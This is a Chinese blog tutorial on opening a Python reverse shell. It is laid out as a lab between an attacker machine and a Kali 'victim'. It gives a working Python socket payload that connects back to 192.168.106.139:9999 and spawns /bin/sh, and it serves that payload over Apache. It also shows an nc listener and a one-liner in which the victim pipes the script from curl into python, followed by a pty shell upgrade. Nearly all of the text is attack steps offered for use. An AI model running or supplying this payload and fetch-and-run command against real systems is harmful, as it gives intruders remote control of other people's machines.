用python反弹shell
2022/9/7 5:22:48
本文主要是介绍用python反弹shell,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
用python反弹shell
攻击机:linux(本文章使用ubuntu)
受害主机:安装了python的windows或者linux(本文章受害主机为kali linux)
1.配置环境:windows安装python , python官网地址: www.python.org ;linux:sudo apt-get install python3
2.攻击机开启http服务,apt install -y apache2 ##本次实验用apache
vi /etc/apache2/sites-enabled/000-default.conf ## 编辑此文件,修改一下配置
<VirtualHost *:80> ## 其他行不变
DocumentRoot /var/www/html ## 浏览器访问目录
rm /var/www/html/index.html ##删除自带主页
/etc/init.d/apache2 restart ## 重启apache服务
service apache2 status ## 查看apache2状态,应为active(running)状态
3.cd /var/www/html ## 切换到/var/www/html目录下
touch reverse_python_shell.py ## 创建文件
vi reverse_python_shell.py ## 编辑文件
##.py文件内容
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.106.139",9999)) #更改IP为自己的外网IP,端口自定义
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
*编辑完后按Esc,再按:,输入wq,按回车
4.攻击机要安装netcat,输入以下命令:
sudo apt-get -y install netcat-traditional
sudo update-alternatives --config nc
nc -lvvp 9999 ## 对9999端口进行监听
5.在受害机上召唤出cmd,输入:curl 192.168.106.139/reverse_py_shell.py | python ## 将文件导入python进行执行
6.反连成功,以下为攻击机终端界面
*python -c ‘import pty;pty.spawn(“/bin/bash”)’ ## 因为已知目标主机安装了python,所以可以引入pty终端库,派生出bash ##bash是linux shell的一种,在bash中可以更方便的进行命令输入
这篇关于用python反弹shell的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-28Python编程基础教程
- 2024-12-27Python编程入门指南
- 2024-12-27Python编程基础
- 2024-12-27Python编程基础教程
- 2024-12-27Python编程基础指南
- 2024-12-24Python编程入门指南
- 2024-12-24Python编程基础入门
- 2024-12-24Python编程基础:变量与数据类型
- 2024-12-23使用python部署一个usdt合约,部署自己的usdt稳定币
- 2024-12-20Python编程入门指南